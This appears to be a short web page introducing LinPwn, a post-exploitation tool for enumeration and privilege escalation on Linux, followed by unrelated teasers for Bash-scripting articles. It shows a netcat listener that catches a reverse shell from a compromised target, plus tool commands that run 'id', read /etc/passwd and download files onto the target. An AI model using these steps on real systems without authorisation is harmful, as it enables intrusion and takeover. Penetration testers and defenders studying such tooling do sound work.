LinPwn is a interactive tool created to assist you in post exploitation enumeration and privilege escalation.
Connection
nc -lvp PORT
on your machine and then run LinPwn on the target machine to get a connection.(LinPwn: Shell) > id
(LinPwn: ReadFile)> /etc/passwd
(LinPwn) > enumerate
(LinPwn: Download) > https://exampleurl.com/file_to_download
I included a file called build.sh this is optional run bash build.sh
to view the build options if you wish to use them.
What Are Bash Comments? In Bash scripting, comments are notes in your code that the…
When you write a Bash script in Linux, you want it to run correctly every…
Introduction If you’re new to Bash scripting, one of the first skills you’ll need is…
What is Bash Scripting? Bash scripting allows you to save multiple Linux commands in a file and…
When it comes to automating tasks on Linux, Bash scripting is an essential skill for both beginners…
Learn how to create and use Bash functions with this complete tutorial. Includes syntax, arguments,…